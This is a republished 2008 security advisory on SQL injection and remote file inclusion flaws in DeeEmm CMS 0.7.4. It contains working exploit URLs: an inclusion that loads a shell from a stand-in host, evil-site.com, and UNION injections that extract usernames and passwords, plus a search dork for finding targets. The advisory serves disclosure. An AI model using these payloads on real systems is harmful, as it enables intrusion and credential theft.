|
|
| Details : SecurityAlert |
|
|
Topic : | DeeEmm CMS (DMCMS) 0.7.4 Multiple Remote Vulnerabilities
|
SecurityAlert : 4169
CVE : CVE-2008-3720 CVE : CVE-2008-3721 CWE : CWE-89
CWE : CWE-94
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Given : No
Credit : IRCRASH
Published : 22.08.2008
Affected Software : | Deeemm, DMCMS, 0.7.4 |
 Advisory Text : ###########################################################################
##########
#### DeeEmm CMS Sql Injection/Rfi
####
###########################################################################
##########
#
#
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#
#Our Site : Http://IRCRASH.COM
#
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)
#
###########################################################################
##########
#
#
#Script Download :
http://surfnet.dl.sourceforge.net/sourceforge/dmcms/dmcms_074.tar.gz
#
#
#Home Page : www.deeemm.com
#
#
#
#DORK : "DeeEmm CMS"
#
#
#
###########################################################################
##########
# [Rfi]
#
#
#
#http://Site/user_language.php?INDM=r3d.w0rm&language_dir=http://evil-site.
com/shell.txt?
#
#
# [Sql Injection]
#
#
#
#http://Site/index.php?page=media`+union+select+0,1,2,4,5,6,7,8,9,user_name
,11,password,13,14,15,16,17,18,19,20,21+from+deeemm_users/*
#
#http://Site/index.php?page=media&id=-99999+union+select+0,1,2,4,5,6,7,8,9,
user_name,11,password,13,14,15,16,17,18,19,20,21+from+deeemm_users
#
#
#
###########################################################################
##########
# Site : Http://IRCRASH.COM
#
###################################### TNX GOD
######################################
References :
http://xforce.iss.net/xforce/xfdb/44506
http://www.milw0rm.com/exploits/6250
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|
|
|
|